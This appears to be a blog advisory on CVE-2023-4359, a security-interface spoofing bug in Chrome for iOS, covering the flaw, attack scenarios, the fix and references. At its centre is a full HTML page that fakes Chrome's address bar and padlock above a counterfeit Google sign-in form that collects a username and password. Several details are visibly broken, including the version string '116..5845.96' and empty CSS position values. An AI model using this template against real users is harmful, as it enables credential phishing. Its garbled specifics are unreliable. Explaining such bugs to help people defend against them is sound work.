On August 15, 2023, the Chromium security team assigned CVE-2023-4359 to a bug that affected Google Chrome on iOS devices. The bug, found in the App Launcher, was about how Chrome handled certain HTML content. Attackers could take advantage of this inappropriate implementation to spoof—or fake—parts of the browser's security user interface (UI). This means that attackers could trick users into thinking a malicious page was safe, possibly leading to phishing or stealing sensitive information.
This post breaks down what the vulnerability was, how an attack could work, code examples, and where to learn more. The patch came with Chrome version 116..5845.96, so if your iOS browser is older than that, update ASAP.
What Exactly Was the Vulnerability?
According to Chromium's release notes, Chrome's App Launcher did not handle crafted HTML correctly. Specifically, a remote attacker could display fake security elements like lock icons or address bars on their malicious web page, making users feel secure even when they were not.
These UI elements are vital. They help users detect safe vs. fake websites, ensure they're sending passwords only on real, secure sites, and more. Spoofing them undermines the whole trust model of web browsing.
Chromium Security Severity: Medium
Affected Version: Chrome on iOS prior to 116..5845.96
Type: Security UI Spoofing via crafted HTML
Exploitability: Remote (attacker just needs you to visit a web page)
How the Exploit Worked
Let’s say an attacker set up a phishing website (like a fake Google login page). In a correctly implemented browser, the security UI (the padlock, the URL bar) can’t be faked by the web page itself.
The bug in Chrome for iOS meant that, under certain conditions, an attacker could design an HTML page that visually “fakes” security indicators so convincingly that most users would be fooled. In particular, Chrome’s App Launcher component incorrectly displayed—or allowed the webpage to display—browser-level UI elements.
How? Typically, the vulnerable browser gave the webpage "too much power" over UI rendering, e.g., in full-screen or popup mode. By abusing this, attackers would make UI elements that look just like legitimate Chrome ones.
Code Snippet: Spoofing the UI
Here’s a simplified HTML example based on findings from researchers and the Chromium issue tracker:
<!DOCTYPE html>
<html>
<head>
<title>Login - Google</title>
<style>
/* Fakes the Chrome address bar at the top */
#fakebar {
background: #f1f3f4;
color: #202124;
width: 100vw;
height: 54px;
position: fixed;
top: ; left: ;
z-index: 9999;
display: flex;
align-items: center;
font-family: sans-serif;
}
#lock {
margin: 15px;
font-size: 28px;
color: #3cba54;
}
#url {
font-size: 19px;
}
body {margin-top:54px;}
</style>
</head>
<body>
<div id="fakebar">
<span id="lock">🔒</span>
<span id="url">https://accounts.google.com</span>;
</div>
<h2>Welcome to Google</h2>
<form>
Username: <input type="text" name="username">
Password: <input type="password" name="password">
<input type="submit" value="Sign In">
</form>
</body>
</html>
In older Chrome for iOS, this could display in a popup that hides the real address bar. Users would only see the fake one, complete with a realistic lock and HTTPS address—even though the page isn’t actually secure!
Possible Attack Scenarios
1. Phishing: Users are lured to open a link via email or SMS. The attacker’s page mimics the Google login, displaying a fake "HTTPS" and lock icon, tricking users into entering credentials.
2. Fake Security Prompts: The attacker could display other UI elements, like fake permission dialogs, tricking users into granting access or revealing info.
3. Man-in-the-Middle: The attack works even through a harmless website if malicious JavaScript is injected, because the browser's own UI is being visually spoofed.
Why It Mattered
- User Trust: Most users rely on visible browser UI—the lock, green address, etc.—to know they're safe. This bug let attackers break that trust.
- Mobile Focus: On desktop, it's easier for users to spot fakes. On mobile, with small screens, UI spoofing is more convincing.
Fix and Mitigation
Google fixed the bug in Chrome for iOS version 116..5845.96. Now, the browser prohibits webpages from spoofing security UI, and always displays real address and lock icons over web content, not inside it.
Update Chrome on iOS to the latest version.
- Never trust lock icons or addresses that appear inside a web page's content. Real ones are in the browser bar.
References and Further Reading
- Google Chrome Releases: Stable Channel Update for iOS
- Chromium Issue 1469646: UI Spoofing via HTML on App Launcher in Chrome for iOS
- CVE Detail: CVE-2023-4359
- Google Security Blog (for updates on Google security issues)
- OWASP: UI Redressing / Clickjacking
Conclusion
CVE-2023-4359 demonstrates how tiny mistakes in browser UI can have big security consequences, especially on mobile. Attackers using crafted HTML could visually spoof Chrome’s own security elements, tricking users and making phishing even more dangerous. Thankfully, it’s fixed—so keep your browser up to date and stay alert to fake security UI.
If you found this post helpful, share it so others can stay secure on their devices!
Remember: Always check for real browser security indicators, never trust web content alone!
Timeline
Published on: 08/15/2023 18:15:00 UTC
Last modified on: 08/27/2023 03:15:00 UTC